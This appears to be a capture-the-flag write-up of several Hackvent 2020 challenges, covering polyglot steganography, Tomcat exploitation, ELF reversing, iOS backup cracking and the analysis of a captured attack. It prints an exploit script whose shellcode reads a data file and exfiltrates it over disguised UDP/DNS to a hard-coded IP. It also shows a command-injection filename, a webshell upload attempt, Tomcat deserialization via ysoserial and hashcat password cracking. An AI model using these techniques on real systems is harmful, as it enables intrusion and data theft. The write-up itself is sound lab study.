The leet challenges started on day 20, but then followed an additional three hard challenges before the second and final leet one. These were all really good challenges. My favorite was a binary and a PCAP of an attacker exploiting the binary, where I needed to reverse the crypto operations in the binary and the exploit to recover the data that was stolen. I really liked one that was another polyglot file where an image turned into an HTML page that dropped a Python script which pull out a docker image containing images that contained a flag. There was also more web exploitation of a Tomcat deserialization CVE, a really interesting ELF reversing challenge, and pulling data from an iOS backup.
On the twelfth day of Christmas my true love sent to me…
twelve rabbits a-rebeling,
eleven ships a-sailing,
ten (twentyfourpointone) pieces a-puzzling,
and the rest is history.
I spent some time trying to cut the HTML page out of this file and get it to work, but it turns out the entire file is a polyglot, functioning as both an image or an HTML page. After making a copy with the .html extension, it opens in Firefox and shows the picture. Clicking in the picture causes some whitespace to appear on top of the image (pushing it down the page) and a text area to appear under it, empty.
JavaScript Analysis
View-Source doesn’t seem to work on the page, but looking in the dev console, the script is there:
JSNice is a good way to clean up and make readable the script. There’s a SHA1 function, which I tested in the console and does perform an actual SHA1-hash, and a B64 function which does seem to do legit base64 encoding.
functiondID(){/** @type {!Element} */cvs=document.createElement("canvas");/** @type {string} */cvs.crossOrigin=px.crossOrigin="Anonymous";px.parentNode.insertBefore(cvs,px);cvs.width=px.width;/** @type {string} */"px";cvs.height=px.height;/** @type {string} */"15em";/** @type {string} */"visible";varpasswd=SHA1("p=")[1]).toUpperCase();/** @type {string} */log.value="TESTING: "+passwd+"\n";if (passwd=="60DB15C4E452C71C5670119E7889351242A83505"){log.value+="Success\nBit Layer="+bL+"\nPixel grid="+gr+"x"+gr+"\nEncoding Density=1 bit per "+gr*gr+" pixels\n";/** @type {!Array} */varchannelOptions=["Red","Green","Blue","All"];...[snipdrawing/decoding]...varlength=parseInt(bTS(params.join("")));g(length);log.value+="Total pixels decoded="+b+"\n";log.value+="Decoded data length="+length+" bytes.\n";;ctx.putImageData(pix,0,0);vardownloadId=B64(bTS(params.join("")));/** @type {string} */varurl="";log.value+="Packaging "+url+" for download\n";log.value+="Safari and IE users, save the Base64 data and decode it manually please,Chrome/edge users CORS, move to firefox.\n";log.value+='BASE64 data="'+downloadId+'"\n';download(,and,downloadId);}else{log.value+="failed.\n";}}
This function checks for a password to see if its SHA1 hash matches a static value, and then does a bunch of decoding and drawing, and eventually calls the download function.
The SHA1 is 60DB15C4E452C71C5670119E7889351242A83505, which crackstation will break as “bunnyrabbitsrule4real”.
That’s getting the url, splitting on p=, and returning the right half. I’ll add ?p=bunnyrabbitsrule4real to the end of the url, and now when I click on a rabbit, there’s a popup asking me to open or save
TESTING: 60DB15C4E452C71C5670119E7889351242A83505
Bit Layer=1
Pixel grid=2x2
Encoding Density=1 bit per 4 pixels
Encoding Channel=All
Image Resolution=1632x1011
Total pixels decoded=7352
Decoded data length=913 bytes.
Packaging for download
Safari and IE users, save the Base64 data and decode it manually please,Chrome/edge users CORS, move to firefox.
BASE64 data="aW1wb3J0IHN5cwppID0gYnl0ZWFycmF5KG9wZW4oc3lzLmFyZ3ZbMV0sICdyYicpLnJlYWQoKS5zcGxpdChzeXMuYXJndlsyXS5lbmNvZGUoJ3V0Zi04JykgKyBiIlxuIilbLTFdKQpqID0gYnl0ZWFycmF5KGIiUmFiYml0cyBhcmUgc21hbGwgbWFtbWFscyBpbiB0aGUgZmFtaWx5IExlcG9yaWRhZSBvZiB0aGUgb3JkZXIgTGFnb21vcnBoYSAoYWxvbmcgd2l0aCB0aGUgaGFyZSBhbmQgdGhlIHBpa2EpLiBPcnljdG9sYWd1cyBjdW5pY3VsdXMgaW5jbHVkZXMgdGhlIEV1cm9wZWFuIHJhYmJpdCBzcGVjaWVzIGFuZCBpdHMgZGVzY2VuZGFudHMsIHRoZSB3b3JsZCdzIDMwNSBicmVlZHNbMV0gb2YgZG9tZXN0aWMgcmFiYml0LiBTeWx2aWxhZ3VzIGluY2x1ZGVzIDEzIHdpbGQgcmFiYml0IHNwZWNpZXMsIGFtb25nIHRoZW0gdGhlIHNldmVuIHR5cGVzIG9mIGNvdHRvbnRhaWwuIFRoZSBFdXJvcGVhbiByYWJiaXQsIHdoaWNoIGhhcyBiZWVuIGludHJvZHVjZWQgb24gZXZlcnkgY29udGluZW50IGV4Y2VwdCBBbnRhcmN0aWNhLCBpcyBmYW1pbGlhciB0aHJvdWdob3V0IHRoZSB3b3JsZCBhcyBhIHdpbGQgcHJleSBhbmltYWwgYW5kIGFzIGEgZG9tZXN0aWNhdGVkIGZvcm0gb2YgbGl2ZXN0b2NrIGFuZCBwZXQuIFdpdGggaXRzIHdpZGVzcHJlYWQgZWZmZWN0IG9uIGVjb2xvZ2llcyBhbmQgY3VsdHVyZXMsIHRoZSByYWJiaXQgKG9yIGJ1bm55KSBpcywgaW4gbWFueSBhcmVhcyBvZiB0aGUgd29ybGQsIGEgcGFydCBvZiBkYWlseSBsaWZlLWFzIGZvb2QsIGNsb3RoaW5nLCBhIGNvbXBhbmlvbiwgYW5kIGEgc291cmNlIG9mIGFydGlzdGljIGluc3BpcmF0aW9uLiIpCm9wZW4oJzExLjd6JywgJ3diJykud3JpdGUoYnl0ZWFycmF5KFtpW19dIF4galtfJWxlbihqKV0gZm9yIF8gaW4gcmFuZ2UobGVuKGkpKV0pKQA"
The data base64-decodes to the same Python file that is offered as a download.
Python Script
The Python script is simple, taking two arguments. The first is a file to open. The second is a string. It will open and read the file, and split it based on the second input string plus a newline, and take the last result.
It will then xor that result byte by byte with some text in the file, and write the result to 11.7z.
importsysi=bytearray(open(sys.argv[1],'rb').read().split(sys.argv[2].encode('utf-8')+b"\n")[-1])j=bytearray(b"Rabbits are small mammals in the family Leporidae of the order Lagomorpha (along with the hare and the pika). Oryctolagus cuniculus includes the European rabbit species and its descendants, the world's 305 breeds[1] of domestic rabbit. Sylvilagus includes 13 wild rabbit species, among them the seven types of cottontail. The European rabbit, which has been introduced on every continent except Antarctica, is familiar throughout the world as a wild prey animal and as a domesticated form of livestock and pet. With its widespread effect on ecologies and cultures, the rabbit (or bunny) is, in many areas of the world, a part of daily life-as food, clothing, a companion, and a source of artistic inspiration.")open('11.7z','wb').write(bytearray([i[_]^j[_%len(j)]for_inrange(len(i))]))
It’s fair to guess that the file is the original image file, but I need a string to give as the second arg. There’s two ways to find it.
The other way to find the key is just to look for strings that end in a newline that might make a good key. This command returned a list of strings that all end in newline with between eight and fifteen printable characters proceeding it:
$strings bfd96926-dd11-4e07-a05a-f6b807570b5a.png | grep-oP'\w{8,15}$' | less
Looking through the list, “breadbread” is in there.
Running the Python script with these inputs creates 11.7z, and it is in fact a a 7-zip archive:
Some googling with these terms will show this is a file related to Docker, specifically the output of the docker save command. The manifest.json describes the config (1d66b052bd26bb9725d5c15a5915bed7300e690facb51465f2d0e62c7d644649.json) and points to all the layers. I’ll come back to this config later.
At this point I could go back to the config file from the container image, but I managed to guess the next step without that. I used cat to dump all the files into xxd -r -p to convert from hex to binary, and the resulting file was an image:
At this point, I need to look at how this image was created. In the docker tarball, there’s a json config file (I’ll cat it into jq . to pretty print it):
Right away I can see it’s using steghide to embed something in an image, and then using xxd to hex encode it and split to break it into parts. Then it deletes things. I’ll clean up the escapes by removing the first layer of "" and adding new lines between the commands:
Given that I’ve recovered the image, what’s left is the steghide. I’ll need to be careful as I break out the command syntax here, as there’s a trick in it, but the syntax highlighting above actually makes it really clear. The password for the steg is bunnies12.jpg\" -ef /tmp/t/hidden.png -p \"SecretPassword. I can paste it in when prompted, or add back some escapes and enter it at the command line:
#steghide extract -sf flimflam.jpg -xf hidden.png
Enter passphrase:
wrote extracted data to "hidden.png".
#steghide extract -sf flimflam.jpg -xf hidden.jpg -p"bunnies12.jpg\\\" -ef /tmp/t/hidden.png -p \\\"SecretPassword"the file "hidden.png" does already exist. overwrite ? (y/n) y
wrote extracted data to "hidden.png".
This image has a QRCode:
Scanning that or uploading to gives the flag.
You can feed this cat with many different things, but only a certain kind of file can endanger the cat.
Do you find that kind of files? And if yes, can you use it to disclose the flag? Ahhh, by the way: The cat likes to hide its stash in /usr/bin/catnip.txt.
Note: The cat is currently in hibernation and will take a few seconds to wake up.
There’s a link to start an instance of the webserver.
Visiting the url http://afd7ca93-d618-4f68-adf9-b55b8bcddbc1.idocker.vuln.landredirects to both https and /cat/. The site is an ASCII cat with an upload form:
The response headers don’t give anything away as far as the server type:
HTTP/1.1200OKAccept-Ranges:bytesContent-Length:100Content-Type:text/htmlDate:Mon, 21 Dec 2020 23:48:49 GMTEtag:W/"100-1605869035000"Last-Modified:Fri, 20 Nov 2020 10:43:55 GMTConnection:close
On uploading files to the server, the cat will report back about them:
If the upload is too big, the site rejects it:
Things That Didn’t Work
Given the challenge didn’t suggest the VPN (so reverse shell not needed) and gives the file location, I had a few ideas of things to go after.
I checked to see if the server was PHP by trying to visit index.php in the /cat/ directory, but it just returned 404 with a redirect to /cat/. Given the file upload, I tried a PHP webshell anyway, but visiting the url just returned the PHP code, no execution.
Given the information about the content of the file, I thought perhaps the file command was being used on it. I tried some command injections by changing the file name to things like “a.php; id”, but the file name seemed to just be that filename, no injection.
The page reports that the uploaded files are saved to /usr/local/uploads, which also seems to be served from /cat/files/. I tried a lot of things that might allow me to read outside of that directory, but anything in the GET request to get files like that seemed to return 400 Bad Request. I was able to upload files to anywhere on the system that this user could write by changing the form header like so:
It then shows up as saved to this location, and but it’s not in my list of files to access:
When I treid to check if index.php would load that the root, the page crashed differently:
The server is running Apache Tomcat (fits the cat theme), and the version is 9.0.34. Googling that version of Tomcat led to CVE-2020-9484, an exploit I used against a HTB machine recently. This post gives a really nice writeup, but the short version is that if I can upload a file and then reference the relative path to that file in a cookie, I can get Tomcat to deserialize that file, which is a way to gain code execution.
To build a payload, I’ll use yososerial to generate a serialized Java payload. You have to find a payload type (there are many to try) and pick a command to run. A successful RCE will crash the current thread, so no output is returned. Given that, I’ll have the exploit copy the flag file into the /usr/local/uploads/ directory. I’ll try different payloads until one works (I’ve had the most luck with the CommonCollections series):
A new apprentice Elf heard about “Configuration as Code”. When he had to solve the problem to protected a secret he came up with this “very sophisticated padlock”.
For the most part, this is quite simple. It prints the message asking for a six digit pin, reads that with gets, adds a null to the end to ensure it’s only six digits, converts the string to an int. The next two lines are interesting, and I’ll come back to them. Then it prints the message about the unlocked secret, and the global flag string, and returns.
What’s odd is that first it calls the address at 0x1124b + input * 0x14. That means there are a million different blocks of code that can be jumped into, each 20 bytes apart. The other odd thing is the function I’ve labeled early_exit, which calls exit to end the program. Since I’ve watched the program successfully print, it either must jump there from within the million code blocks, or it must print out the same thing elsewhere.
Jump Code
Looking at the code jumped to with PIN 000000, it’s pretty simple:
It sets ECX to some large number, then enters a loop that decrements ECX, breaking when ECX is 0. This is just a loop to waste some time / computer cycles. Then it moves the character { into the address as EBX, increments EBX, and jumps to some other address. What’s interesting is that this block is exactly 0x14 = 20 bytes long, and immediately following this block is another of the same form.
The character here is {, which is the first character in the string that came out when I ran the program and entered 000000. Following the jump the next block is the same, just with a W character:
In fact, if pin 569730 is entered, it prints the same output as pin 000000 without the first character:
PIN (6 digits): 000000
PIN (6 digits): 569730
It’s clear the program is building the string based on the starting block identified by the pin. Following this for a while, eventually it ends up with a jump to 0x11226:
This is just back into main, to the line that loads the static “Unlocked secret is:” string to pass to printf.
Each pin starts execution into this block of code, where it jumps around collecting characters and wasting time before ending with the print.
Given this known understanding of the file, a Python script can read in the binary file, focus on the 20 * 1000000 bytes of code blocks, and jump through them collecting characters.
I’ll read in the file, and isolate the block of code:
Next, I’ll write a function that recursively builds the string. I takes a starting block and will find the character at that offset (13 bytes into the block), and then return that character + the function called with the offset of the jump. The jump is a relative jump, so that address is relative to the next instruction, which would be the start of the next block, or the start of the current block plus 20.
I’ll use lru_cache so that any time the same block is passed in, it can immediately return the result without re-running all the recursive calls.
Santa tried to get an important file back from his old mobile phone backup. Thankfully he left a post-it note on his phone with the PIN. Sadly Rudolph thought the Apple was real and started eating it (there we go again…). Now only the first of eight digits, a 2, is still visible…
But maybe you can do something to help him get his important stuff back?
The .rar archive contains an iOS backup. There’s a bunch of 40-hex character named file that are different encrypted bits, as well as several other files. Given that I want to recover the pin, I followed this article. itunes_backup2hashcat will generate a hash from the Manifest.plist file:
I’ll save that hash in Manifest.hash. The format matches hashcat mode 14700. Since I know the password is eight digits, and the first is “2”, I can either make a wordlist, or use masks in Hashcat. On originally solving, I just made a wordlist:
$for i in$(seq 20000000 30000000);do echo$i;done> nums
But a better way to do this is to give -a 3 to specify using masks as follows:
$ hashcat -a 3 -m 14700 ./Manifest.hash 2?d?d?d?d?d?d?d
That mask uses ?d to represent an unknown digit. It finds a pin I probably could have guessed, 20201225.
Access Files
To access the files in the backup, I used a free trial of FonePaw. On running it, there are some troll flags (and a hidden flag, see below), but what’s important is two contacts, M and N, each of which have a “notes” section that contains a very large integer:
Given the category of this challenge is crypto, and those two letters meaning when it comes to RSA, seems like there’s an RSA problem to solve here.
RSA Manually
N is the public key in RSA, so I’ll need to factor it. factordb is a good place to check, and it does have this one factored. Now I have p, q, n, and the message. I can assume the default e, 65537. That means the private key, d, is the mod inverse of e and the product of p-1 and q-1. In Python 3.8 and later, this can be done in one line:
RsaCtfTool can do all of that math starting with n, e, and m through the plaintext message:
# python3 /opt/RsaCtfTool/ -n 77534090655128210476812812639070684519317429042401383232913500313570136429769 -e 65537 --uncipher 6344440980251505214334711510534398387022222632429506422215055328147354699502 --attack factordb
private argument is not set, the private key will not be displayed, even if recovered.
[*] Testing key /tmp/tmpnjopalj8.
[*] Performing factordb attack on /tmp/tmpnjopalj8.
Results for /tmp/tmpnjopalj8:
Unciphered data :
HEX : 0x0000000000485632307b73307272795f6e305f67616d335f746f5f706c61797d
INT (big endian) : 29757593747455483525592829184976151422656862335100602522242480509
INT (little endian) : 56753566960650598288217394598913266125073984765818621753275514254169309446144
STR : b'\x00\x00\x00\x00\x00HV20{s0rry_n0_gam3_to_play}'
I included the attack type of factordb, but it will do a bunch of other things and eventually get to that same conclusion (and fun for much longer) without that flag. Then it decrypts the message and prints the flag.
HV20.H3 Hidden in Plain Sight
I don’t know
In the previous challenge FonePaw showed not only the two contacts M and N, but a third contact with no name:
That contact contains only a homepage, but on inspection, the url doesn’t look like a valid url:
It does look like base64, which decodes to the hidden flag:
In order to prevent the leakage of any flags, Santa decided to instruct his elves to implement a secure data storage, which encrypts all entered data before storing it to disk.
According to the paradigm Always implement your own crypto the elves designed a custom hash function for storing user passwords as well as a custom stream cipher, which is used to encrypt the stored data.
Santa is very pleased with the work of the elves and stores a flag in the application. For his password he usually uses the secure password generatorshuf -n1 rockyou.txt.
Giving each other a pat on the back for the good work the elves lean back in their chairs relaxedly, when suddenly the intrusion detection system raises an alert: the application seems to be exploited remotely!
Santa and the elves need your help!
The intrusion detection system captured the network traffic of the whole attack.
How did the attacker got in? Was (s)he able to steal the flag?
The program is a data storage application. It will ask for a username, and then either prompt to create a password for a new user, or ask for a password for a returning user. The user can store data, retrieve data, and delete that data.
welcome to santa's secure data storage!
please login with existing credentials or enter new username ...
creating user '0xdf' ...
please set your password (max-length: 19)
welcome 0xdf!
[0] show data
[1] enter data
[2] delete data
[3] quit
no data found!
[0] show data
[1] enter data
[2] delete data
[3] quit
data>this is test data
[0] show data
[1] enter data
[2] delete data
[3] quit
your secret data:
this is test data
[0] show data
[1] enter data
[2] delete data
[3] quit
good bye!
After that session, two files were created in data/:
$ls data/
0xdf_data.txt 0xdf_pwd.txt
No matter what is entered, the [username]_pwd.txt file is 16 bytes:
This matches with the information provided in the challenge assuming the hashing algorithm is being applied to the password and the stream cipher is being applied to the data, as a hashing algorithm would produce a fixed length output, and the stream cipher would produce output the same length as the input.
Static RE
Because the binary is not stripped, opening it in Ghidra presents helpful function names:
The main function calls login_username, login_password, and show_menu:
show_menu prints the menu, processes the input, and then calls the appropriate function:
voidshow_menu(void){charinput_str[10];charuser_data_file[44];intinput_int;snprintf(user_data_file,0x28,"data/%s_data.txt",username);while(true){while(true){while(true){while(true){puts("[0] show data");puts("[1] enter data");puts("[2] delete data");puts("[3] quit");printf("choice> ");fgets(input_str,1000,stdin);input_int=atoi(input_str);if(input_int!=0)break;show_data(user_data_file);}if(input_int!=1)break;enter_data(user_data_file);}if(input_int!=2)break;delete_data(user_data_file);}if(input_int==3)break;puts("unknown choice!");}puts("good bye!");return;}
Right away I see the buffer overflow where it calls fgets to read up to 1000 bytes of menu choice into a 10 byte buffer. To reach the return, the result of atoi on the input string will have to be 3, but that just means that any string starting with 3[non-digit] will work.
Functions like show_data work as expected, trying to read the data from the _data.txt file and passing the contents to decrypt:
voidshow_data(char*user_data_file){intiVar1;FILE*fd;size_t*outlen;size_tin_R8;EVP_PKEY_CTXbuffer[104];FILE*fd_copy;iVar1=access(user_data_file,0);if(iVar1==-1){puts("no data found!");}else{memset(buffer,0,100);fd=fopen(user_data_file,"r");fd_copy=fd;fread(buffer,1,100,fd);fclose(fd_copy);decrypt(buffer,pwd_hash);printf("your secret data:\n%s\n",buffer);}return;}
Interestingly, the decrypt function also takes a global variable, pwd_hash, which is set in the login_password function via the calc_hash function. decrypt loops over the input files, calling keystream_get_char, xoring the result with the current byte, and then breaking if the resulting plaintext is null.
It initializes four four-byte words to static values, and then loops over each character of the input xoring each byte by some variation on the input byte. Then it shuffles the four words around, and repeats. I can recreate this in Python relatively easily:
When recreating this kind of bit-wise operation in Python from C, it’s important to make sure that the bit boundaries are followed. For example, a one byte char in C with the value 0x44 shifted left by two bits would return 0x10, where as Python would return 0x110. C cares very much about the size of the element holding the value, whereas Python is more forgiving. It’s ok here because in each case, the code will use & 0xff to get just one byte, and then shift that into place.
With this complete, I can test by hashing “0xdf” and validating that the result matches what is stored in the data directory.
Ghidra totally simplifies this function in a way that I did not believe at first. It suggests that the keystream by at position i is calculated by taking the ith byte of the hash (mod 16, so it just loops to the beginning). That byte mod 10 is used to grab a byte from a static byte string, key, which is xored by the hash byte and i to make the key byte.
There’s a bit of weirdness that could come into play for i really big, but I’ll ignore that. Not believing this disassembly, I actually went thought the hassel of making the Python equivalent of the assembly that looks like:
There’s some tricks in there multiplying by -0x3333333333333333, shifting, etc that end up just be the mod 10 Ghidra identified. So the function can be:
Looking at attack.pcapng, all but one of the packets are a single TCP stream from to the the server at on port 5555 (which matches
Immediately after, there’s a single UDP port 53 packet, which Wireshark thinks is DNS, but doesn’t seem like valid DNS (at least not in the query):
The attacker entered a long buffer at the choice> prompt, which would be exploiting the buffer overflow noted earlier. Looking at the stream as hex, I’ll grab all the bytes sent.
To debug this, I’ll write a short Python script that exploits the same way as in the PCAP:
#!/usr/bin/env python3
frompwnimport*p=process('./data_storage')p.readuntil('username> ')p.sendline('evil0r')p.readuntil('password> ')p.sendline('lovebug1')input('Attach gdb and hit enter to continue')payload='3 '+'A'*64+"\x10\x41\x40\x00\x00\x00\x00\x00\x68\x74\x78\x74\x00\x48\xbf\x74\x61\x5f\x64\x61\x74\x61\x2e\x57\x48\xbf\x64\x61\x74\x61\x2f\x73\x61\x6e\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\xba\x00\x00\x01\x00\x01\x00\x00\x00\x52\x6a\x00\x6a\x00\x6a\x00\x6a\x00\x48\x89\xe6\x48\xba\x01\x00\x00\x00\x00\x00\x00\x20\x52\x48\xba\x00\x00\x00\x13\x37\x01\x00\x00\x52\xba\x20\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\x48\x31\xc9\x81\x34\x0e\xef\xbe\xad\xde\x48\x83\xc1\x04\x48\x83\xf9\x20\x75\xef\xbf\x02\x00\x00\x00\xbe\x02\x00\x00\x00\x48\x31\xd2\xb8\x29\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xc6\x03\xba\x32\x00\x00\x00\x41\xba\x00\x00\x00\x00\x6a\x00\x49\xb8\x02\x00\x00\x35\xc0\xa8\x00\x2a\x41\x50\x49\x89\xe0\x41\xb9\x10\x00\x00\x00\xb8\x2c\x00\x00\x00\x0f\x05\xbf\x00\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05\x0a"p.send(payload)p.interactive()
I can run this, then in a different window run gdb -p $(pidof data_storage) to attach to it and debug it.
The attack overwrites the return address with 0x404110, which is the global address of pwhash. The trick here is that the hash of “lovebug1”, the password given, starts with 0xff 0xe4:
0xffe4 is the instruction for JMP RSP, which will be the rest of the payload above. Trying to run this in a debugger will fail because the memory segment containing 0x404110 is not marked executable:
I can just run to that point and then set $rip=[next address on the stack] and debug through that. I can also just dump the instructions using x/50i [address on stack]. First, it builds the string data/santa_data.txt and calls open:
It’s important to note that the buffer pointed to in the sendto syscall is RSP, which now has more stuff on top of the stack before the xored buffer, specifically 13 bytes that make up a fake DNS header, so that the exfilled data becomes the query. Santa’s data encrypted and then xored by 0xdeadbeef starts at the 0xe5 at offset 0x37 in this dump from Wireshark:
I grabbed that data and copied it into a Python terminal. I can remove the xor with the following: